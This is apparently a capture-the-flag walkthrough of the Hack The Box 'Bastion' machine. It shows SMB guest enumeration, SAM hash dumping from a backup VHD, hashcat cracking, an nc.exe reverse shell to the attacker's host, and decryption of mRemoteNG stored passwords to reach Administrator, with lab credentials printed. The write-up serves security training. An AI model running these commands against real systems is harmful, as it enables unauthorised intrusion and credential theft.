BASTION

PRIMARY CATEGORY → EASY

Summary

• SMB Enumeration (Netexec, SMBClient & SMBMap)
• Mounting via CIFS a Remote Shared Resource
• Windows Registry Files extraction from a VHD File using 7z
• VHD File Mounting in Linux through GuestMount
• LM and NTLMv1 Hashes dump from SAM and SYSTEM (Impacket Secretsdump.py)
• Cracking NTLMv1 Hashes using Hashcat
• Reverse Connection stablished through an uploaded Netcat binary
• Privesc by Extracting and Decrypting mRemoteNG passwords from a confCons.xml file using a custom script
• Connection to the remote machine as Administrator via WinRM (Evil-WinRM), SMB (PSexec) and SSH

---

Setup

Directory creation with the Machine’s Name

mkdir Bastion && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

Reference

Bastion

mkt

Tree

Bastion

.
├── evidence
│   ├── creds
│   ├── data
│   └── screenshots
├── logs
├── scans
├── scope
└── tools

---

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

• About 64 → Linux
• About 128 → Windows

Bastion/scans

ping -c1 10.129.235.42

Command Output

PING 10.129.235.42 (10.129.235.42) 56(84) bytes of data.
64 bytes from 10.129.235.42: icmp_seq=1 ttl=127 time=43.0 ms
 
--- 10.129.235.42 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 43.026/43.026/43.026/0.000 ms

As mentioned, according to the TTL, It seems that It is a Windows Target

Port Scanning

General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

Bastion/scans

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.235.42

AllPorts Output

Bastion/scans/AllPorts

# Nmap 7.94SVN scan initiated Tue Jan 21 18:01:20 2025 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG allPorts 10.129.235.42
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.129.235.42 ()  Status: Up
Host: 10.129.235.42 ()  Ports: 22/open/tcp//ssh///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 5985/open/tcp//wsman///, 47001/open/tcp//winrm///, 49664/open/tcp/////, 49665/open/tcp/////, 49666/open/tcp/////, 49667/open/tcp/////, 49668/open/tcp/////, 49669/open/tcp/////, 49670/open/tcp/////
# Nmap done at Tue Jan 21 18:01:33 2025 -- 1 IP address (1 host up) scanned in 12.27 seconds

Open Ports → 22, 135, 139, 445 and 5985

The remaining ones are Dynamic RPC Ports

Comprehensive Scan

The ExtractPorts utility is used to get a Readable Summary of the previous scan and have all Open Ports copied to the clipboard

Bastion/Scans

extractPorts allPorts

ExtractPorts Output

Bastion/scans

[+] Extracting information...
 
    [+] IP Address: 10.129.235.42
    [+] Open Ports: 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
 
[+] Ports Copied to Clipboard

Then, the Comprehensive Scan is performed to gather the Service and Version running on each open port and launch a set of Nmap Basic Recon Scripts

Note that this scan is also exported to have evidence at hand

Bastion/Scans

nmap -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -sCV -oN targeted 10.129.235.42

Targeted Output

Bastion/scans/Targeted

# Nmap 7.94SVN scan initiated Tue Jan 21 18:09:08 2025 as: nmap -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -sCV -oN targeted 10.129.235.42
Nmap scan report for bastion (10.129.235.42)
Host is up (0.21s latency).
 
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time:
|   date: 2025-01-21T17:10:09
|_  start_date: 2025-01-21T16:57:55
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-21T18:10:08+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: -19m59s, deviation: 34m35s, median: -1s
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 21 18:10:15 2025 -- 1 IP address (1 host up) scanned in 67.62 seconds

22 - SSH

OpenSSH Version → v7.9

Banner Grabbing

The Version of the Service running can also be obtained via Banner Grabbing as follows →

Bastion/scans

nc -v 10.129.235.42 22 <<< ""

Command Output

MACHINE_NAME/scans

 
bastion [10.129.235.42] 22 (ssh) open
SSH-2.0-OpenSSH_for_Windows_7.9

CVE-2018-15473

All the OpenSSH Versions prior to the v7.7 one are vulnerable to a System User Enumeration

Reference

In this case, this does not apply since the OpenSSH Version is 7.9

139, 445 - SMB

Hostname and OS Version Extraction

First of all, let’s extract some information such as the OS Version, hostname and other stuff using netexec

Reference

Bastion/evidence/data

nxc smb 10.129.235.42

Command Output

SMB         10.129.235.42   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)

It seems that it’s a Windows Server 2016 x64 and its name is Bastion

Therefore, we should add an entry in the /etc/hosts file related to this host

Bastion/evidence/data

printf "10.129.235.42\tbastion\n" >> /etc/hosts

Shared Resources Enumeration

Since we do not yet have valid credentials yet to authenticate through SMB, let’s use a Null Session to enumerate any shared resources

Bastion/evidence/data

smbclient --user '' --no-pass --list //bastion

Command Output

session setup failed: NT_STATUS_ACCESS_DENIED

We cannot enumerate anything via Null Sessions

Try to authenticate using a random username

Bastion/evidence/data

smbclient --user 'anyRandomUser' --no-pass --list //bastion

Command Output

>      Sharename       Type      Comment
      ---------       ----      -------
      ADMIN$          Disk      Remote Admin
      Backups         Disk
      C$              Disk      Default share
      IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
 
      Server               Comment
      ---------            -------
 
      Workgroup            Master
      ---------            -------

And now we are able to list certain shared resources

But we do not see the permissions we have on those resources. Therefore, we can use netexec or smbmap to accomplish this task

• Netexec

Bastion/evidence/data

nxc smb bastion --username 'anyRandomUser' --password '' --shares

Command Output

SMB         10.129.235.42   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.235.42   445    BASTION          [+] Bastion\anyRandomUser:
SMB         10.129.235.42   445    BASTION          [*] Enumerated shares
SMB         10.129.235.42   445    BASTION          Share           Permissions     Remark
SMB         10.129.235.42   445    BASTION          -----           -----------     ------
SMB         10.129.235.42   445    BASTION          ADMIN$                          Remote Admin
SMB         10.129.235.42   445    BASTION          Backups         READ,WRITE
SMB         10.129.235.42   445    BASTION          C$                              Default share
SMB         10.129.235.42   445    BASTION          IPC$                            Remote IPC

• Smbmap

Bastion/evidence/data

smbmap -H bastion -u 'anyRandomUser' -p ''

Command Output

[+] Guest session          IP: bastion:445 Name: unknown             
[/] Work[!] Unable to remove test directory at \\bastion\Backups\TXWVDQEFPB, please remove manually
      Disk                                                    Permissions     Comment
      ----                                                    -----------     -------
      ADMIN$                                                  NO ACCESS       Remote Admin
      Backups                                                 READ, WRITE
      C$                                                      NO ACCESS       Default share
      IPC$                                                    READ ONLY       Remote IPC

One resource stands out from the rest and we have READ and WRITE permissions → Backups

Connect to it using smbclient to list list its content

Bastion/evidence/data

smbclient --user 'anyRandomUser' --no-pass //bastion/Backups

Command Output

 
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
  .                                   D        0  Tue Jan 21 18:46:44 2025
  ..                                  D        0  Tue Jan 21 18:46:44 2025
  aRHbwuiopS                          D        0  Tue Jan 21 18:27:13 2025
  frxwBaOdmQ                          D        0  Tue Jan 21 18:27:32 2025
  note.txt                           AR      116  Tue Apr 16 12:10:09 2019
  NREJFPIUQV                          D        0  Tue Jan 21 18:45:32 2025
  SDT65CB.tmp                         A        0  Fri Feb 22 13:43:08 2019
  TXWVDQEFPB                          D        0  Tue Jan 21 18:40:24 2025
  WindowsImageBackup                 Dn        0  Fri Feb 22 13:44:02 2019
  YEFoKsCRer                          D        0  Tue Jan 21 18:46:44 2025
 
              5638911 blocks of size 4096. 1177306 blocks available
smb: \>
 

Remember that, for resources with a large file structure, it may be more convenient to use netexec and its spider_plus module or smbmap

In that case, proceed as follows →

• Netexec + Spider_Plus Module

Bastion/evidence/data

nxc smb bastion --username 'anyRandomUser' --password '' --module spider_plus --share 'Backups'

Command Ouptut

SMB         10.129.235.42   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.235.42   445    BASTION          [+] Bastion\anyRandomUser:
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.235.42   445    BASTION          [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.235.42   445    BASTION          [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.235.42   445    BASTION          [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.235.42   445    BASTION          [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.235.42   445    BASTION          [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.129.235.42   445    BASTION          [*] Enumerated shares
SMB         10.129.235.42   445    BASTION          Share           Permissions     Remark
SMB         10.129.235.42   445    BASTION          -----           -----------     ------
SMB         10.129.235.42   445    BASTION          ADMIN$                          Remote Admin
SMB         10.129.235.42   445    BASTION          Backups         READ,WRITE
SMB         10.129.235.42   445    BASTION          C$                              Default share
SMB         10.129.235.42   445    BASTION          IPC$                            Remote IPC
SPIDER_PLUS 10.129.235.42   445    BASTION          [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.129.235.42.json".
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] SMB Shares:           4 (ADMIN$, Backups, C$, IPC$)
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] SMB Readable Shares:  1 (Backups)
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] SMB Writable Shares:  1 (Backups)
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] Total folders found:  11
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] Total files found:    19
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] File size average:    273.98 MB
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] File size min:        0 B
SPIDER_PLUS 10.129.235.42   445    BASTION          [*] File size max:        5.05 GB

Bastion/evidence/data

cat --language json -- /tmp/nxc_hosted/nxc_spider_plus/10.129.235.42.json

• Smbmap

Bastion/evidence/data

smbmap -H bastion -u 'anyRandomUser' -p '' -R

Regardless of the SMB enumeration tool used, there is a note.txt file and a WindowsImageBackup directory

Mounting via CIFS (SMBv1 Implementation) a Remote Shared Resource

Since the above directory usually contains Windows Backups/Images, being large files, we will mount the Backups shared resource locally to inspect it properly instead of download it

Bastion/evidence/data

mkdir bastion_backups

Bastion/evidence/data

mount --types cifs --options username='anyRandomUser',password='' //10.129.235.42/Backups bastion_backups

One mounted, we can use tree to get an overview of the file structure

tree -a bastion_backups

Command Output

bastion_backups
├── aRHbwuiopS
├── BDAYVESCNP
├── frxwBaOdmQ
├── INcXSmpztM
├── LDGBRATQIH
├── note.txt
├── NREJFPIUQV
├── SDT65CB.tmp
├── TXWVDQEFPB
├── WindowsImageBackup
│   └── L4mpje-PC
│       ├── Backup 2019-02-22 124351
│       │   ├── 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│       │   ├── 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│       │   ├── BackupSpecs.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│       │   ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│       │   └── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
│       ├── Catalog
│       │   ├── BackupGlobalCatalog
│       │   └── GlobalCatalog
│       ├── MediaId
│       └── SPPMetadataCache
│           └── {cd113385-65ff-4ea2-8ced-5630f6feca8f}
├── XQURBGGCNF
└── YEFoKsCRer
 
15 directories, 19 files
 

At first glance, there are three interesting files, the note.txt and two VHD files

By extracting the content of the .txt file we obtain the following →

Note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Nothing interesting, but it seems that we have done well by mounting the shared resource locally instead of download all its content

In the other hand, we have two VHD files.

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

du -shc *.vhd

Command Output

37M	9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
5,1G	9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
5,1G	total

Note that it is not necessary to use a Windows Host to extract the content of those Virtual Disks or mount them

From Linux, both tasks can be accomplished as follows →

VHD Data Extraction

We can use tools such as 7z to list the entire content of a VHD file and extract it or part of it

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

7z l 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd

The lightest VHD file does not have anything interesing. It seems to be a Boot partition of a Windows System

But, by inspecting the other one, things change since its content corresponds to a Windows OS File System

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

The first thought I have, as the Windows Host is not booted, is to obtain the SAM and System registry files

With both files, we can extract the NTLM Hashes from the SAM using tools such as secretsdump.py or samdump2

INFO

Note that it is always necessary to extract, in addition to the SAM file, the SYSTEM file as it contains the Boot Key used to encrypt the NTLM Hashes inside the SAM file

Therefore, let’s verify the path of both files inside the VHD

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd | grep -iP -- '(SAM|SYSTEM)$'

Then, extract them as follows →

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

7z e 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -o/home/al3xbb/Desktop/4l3xBB/HTB/Bastion_notes/evidence/data Windows/System32/config/SAM

Once we have both SAM and SYSTEM files, just use secretsdump.py from Impacket to extract the NTLM Hashes

Reference

Bastion/evidence/data

secretsdump.py LOCAL -outputfile hashes -sam SAM -system SYSTEM

Hashes.sam

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Cleaning up...

Having those hashes, we can apply Pass-the-hash or try to crack them offline using hashcat or john

Maybe it also can be done using these websites →

• Hashes.com
• CrackStation.net

VHD File Mounting

Instead of use 7z to extract the data stored inside a VHD file, we can use guestmount to mount a Virtual Disk, such as a VHD or VHDX, in a local directory

bastion_backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/al3xbb/Desktop/4l3xBB/HTB/Bastion_notes/evidence/data/bastion_vhd -v

Once the VHD is mounted locally, just copy the SAM and SYSTEM files

Bastion/evidence/data

cp bastion_vhd/Windows/System32/config/{SAM,SYSTEM} .

Then, the idea is the same as before, just extract the NTLM Hashes using secretsdump.py to perform Pass-the-Hash or to crack them offline

First, we check if the extracted hashes are valid as follows →

Bastion/evidence/data

nxc smb bastion --username 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9

Command Output

SMB         10.129.235.42   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.235.42   445    BASTION          [-] Bastion\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE

The NTLM hash of the Administrator user is invalid, let’s check the other one

nxc smb bastion --username 'l4mpje' --hash aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9

Command Output

SMB         10.129.235.42   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.235.42   445    BASTION          [+] Bastion\l4mpje:26112010952d963c8dc4217daec986d9

Unlike the other one, this one is valid

Remember that the port 5985 related to WinRM is open, but netexec did not report the Pwned message, so this user may not belong to the Remote Management Users group

We list again the available shares but this time authenticating as the above user to check if it has other type of permissions on those folders

smbmap -H bastion -u 'l4mpje' -p 'aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9'

Command Output

[+] IP: bastion:445.    Name: unknown                                  
      Disk                                                    Permissions     Comment
      ----                                                    -----------     -------
      ADMIN$                                                  NO ACCESS       Remote Admin
      Backups                                                 READ, WRITE
      C$                                                      NO ACCESS       Default share
      IPC$                                                    READ ONLY       Remote IPC
 

It has the same type of permissions that prior authentication

Since this user doest not have write permission on the ADMIN$ or C$ shared folders, we cannot use psxec.py from Impacket to upload an executable that creates a service on the target to be able to execute commands and receive their output

Note that there is an OpenSSH server listening on Port 22. Let’s try to crack these hashes and get a valid password to try to log in as the above user via SSH

Cracking NTLM Hashes

Extract NTLM hashes from the hash.sam file

Bastion/evidence/data

awk -F: '{ print $4 }' hashes.sam > hashes

Then, use hashcat to try to crack them as follows →

Bastion/evidence/data

hashcat --hash-type 1000 --attack-mode 0 --force -O hashes /usr/share/wordlists/rockyou.txt

To display them →

hashcat --hash-type 1000 --show hashes

Command Output

31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje

It seems we have a valid password right now

Let’s log in now via SSH as L4mpje user using the previous credential

Bastion/evidence/data

ssh -p22 l4mpje@bastion

And Boom! We are in as L4mpje

---

Shell as System User

The shell we get via SSH is a bit weird and most of the shortcuts dont work

We can execute remote commands via SSH without get an interactive shell as follows

ssh -p<PORT> <USER>@<TARGET> "<COMMAND>"

Therefore, we launch a Powershell instance to see if something changes

ssh -p22 l4mpje@bastion "powershell.exe"

Now less rare but shortcuts still do not work. Just upload a nc.exe file and execute it to get an interactive shell

From the attacker, locate a nc.exe and copy to the current directory to share it via a Python SimpleHTTPServer

Bastion/evidence/data

locate nc.exe
cp /usr/share/seclist/Web-Shells/FuzzDB/nc.exe . # No conflict with Defender

Bastion/evidence/data

python3 -m http.server 8888

From the target, move to a directory where the current user has write permission and download that resource

AppLocker Bypass

cd C:\Windows\System32\spool\drivers\color

IWR -UseBasicParsing -OutFile '.\nc.exe' -Uri 'http://10.10.16.34:8888/nc.exe'

Once download, from the attacker again, set a listener with nc and wrap the reverse connection using rlwrap to get a more interactive PTY/TTY

Bastion/evidence/data

rlwrap -CaR nc -nlvp 443

And execute the nc.exe as follows from the target to send a powershell instance →

.\nc.exe -e powershell.exe 10.10.16.34 443

And Boom! We have an interactive shell to properly inpect the target. The only thing we cannot do is C-c

We could use ConPTYShell, but it only works from Windows 10 or Windows Server 2019, and this machine is a Windows Server 2016. So, just be careful 😊

By the way, we can get the non-privilege flag

Get-Content C:\Users\l4mpje\Desktop\user.txt

---

Privesc

Initial Non-Privileged User → L4mpje

mRemoteNG - Credentials Extraction

Once we are in as L4mpje, we do not find nothing interesting in C:\

The same applies to the C:\Users\l4mpje directory

Although, if we take a look into C:\Program Files (x86) directory, there is an unusual program folder → mRemoteNG

This is a software used as a remote connection manager

Therefore, I guess that it stores credentials related to existing or saved connections somewhere

Doing some research, we found the following article where they mention a XML configuration file which stores the password credentials of saved connections

This file is usually located in → %APPDATA%\mRemoteNG

Therefore, let’s try to find this file in the target system → confCons.xml

Get-ChildItem -Path C:\ -Force -Recurse -ErrorAction SilentlyContinue -WarningAction SilentlyContinue | Where-Object { $_.Name -Match 'confCons.xml' }

Command Output

Directory: C:\Users\L4mpje\AppData\Roaming\mRemoteNG
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        22-2-2019     14:03           6316 confCons.xml
-a----        22-2-2019     14:02           6194 confCons.xml.20190222-14022773
                                                 53.backup
-a----        22-2-2019     14:02           6206 confCons.xml.20190222-14023390
                                                 71.backup
-a----        22-2-2019     14:02           6218 confCons.xml.20190222-14023792
                                                 27.backup
-a----        22-2-2019     14:02           6231 confCons.xml.20190222-14030706
                                                 44.backup
-a----        22-2-2019     14:03           6319 confCons.xml.20190222-14031004
                                                 88.backup
-a----        22-2-2019     14:03           6318 confCons.xml.20190222-14032200
                                                 26.backup
-a----        22-2-2019     14:03           6315 confCons.xml.20190222-14032612
                                                 68.backup
-a----        22-2-2019     14:03           6316 confCons.xml.20190222-14032728
                                                 31.backup
-a----        22-2-2019     14:03           6315 confCons.xml.20190222-14034332
                                                 99.backup
-a----        22-2-2019     14:03           6316 confCons.xml.20190222-14034865
                                                 80.backup

File location → C:\Users\L4mpje\AppData\Roaming\mRemoteNG

Inpecting that file, the passwords are stored in base64. But, if we try to decode them, it seems that they were encrypted

Therefore, we need to know several things such as →

• Symmetric Encryption Algorithm used
• Symmetric Encryption Key
• IV or Nonce
• Whether a Key Derivation Function has been applied on the symmetric encryption key, and if yes, which one has been used

And we may need to know more data depending on the algorithm used

By following this other article, we get all the information we need

First of all, the default master key used is mR3m

A PBKDF2-SHA1 function is applied on the above key to generate the symmetric encryption key

After that, the password is encrypted through AES-GCM using the derivated master key and an IV or Nonce

Then, two values are generated, the encrypted password and a Tag used to validate data integrity

The above two values together with the IV and the PBKDF2-SHA1’s Salt are concatenated and base64-encoded

Note that this process applies for mRemoteNG 1.75v or newer. If we inspect the content of the C:\Program Files (x86)\mRemoteNG directory, we find a changelog.txt

The last entry in this file correponds to 1.76.10v, so we know that the software installed on the target is newer than the 1.75v

Thus, since we have the confCons.xml file, we can try to decrypt the stored passwords using mR3m default master key

To perform this task, just follow the steps of the referenced Github repository and run the script as indicated →

Reference

python3 mRemoteNG.py --file confCons.xml

Command Output

[↖] Decrypt: Trying to decrypt the passwords... ⌛
 
[+] Password ⮕
 
    [*] Encrypted 🔒: aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
    [*] Plain 🔓: thXLHM96BeKL0ER2
 
[+] Password ⮕
 
    [*] Encrypted 🔒: yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
    [*] Plain 🔓: bureaulampje

Let’s check if the obtained credentials for the Administrator user are valid

nxc smb bastion --username 'Administrator' --password 'thXLHM96BeKL0ER2'

Command Output

SMB         10.129.136.29   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.136.29   445    BASTION          [+] Bastion\Administrator:thXLHM96BeKL0ER2 (Pwn3d!)

Here we go! From here, we have several ways to connect to the remote machine since we are Administrators and the WinRM Port is listening

SSH

As we have done earlier with the L4mpje user, the SSH service is listening in the target, therefore, we can use the SSH client to establish a connection and log in as the Administrator user

ssh -p22 administrator@bastion "powershell.exe"

WinRM

Reference

Since we are administrators and the WinRM’s 5985 Port is enabled and listening, we can access to the target via Evil-WinRM as well

evil-winrm --ip bastion --user 'administrator' --password 'thXLHM96BeKL0ER2'

PSExec

Reference

Being Administrator makes that we have write access on standard SMB shared folders such as ADMIN* or *C\

Thus, we can gain access to the machine via SMB using psexec.py tool from the Impacket suite

Remember that this tool takes advantage of the write permissions on the ADMIN$ folder to upload an .EXE file that creates and starts a service to be able to execute remote commands and receive their output

psexec.py WORKGROUP/administrator:'thXLHM96BeKL0ER2'@bastion

Regarless of the method used to connect to the machine, the result is the same, we have access to it as Administrators

Just get the content of the root.txt file and move on to the next 😊

---

Custom Exploits

mRemoteNG’s Password Decrypter

See here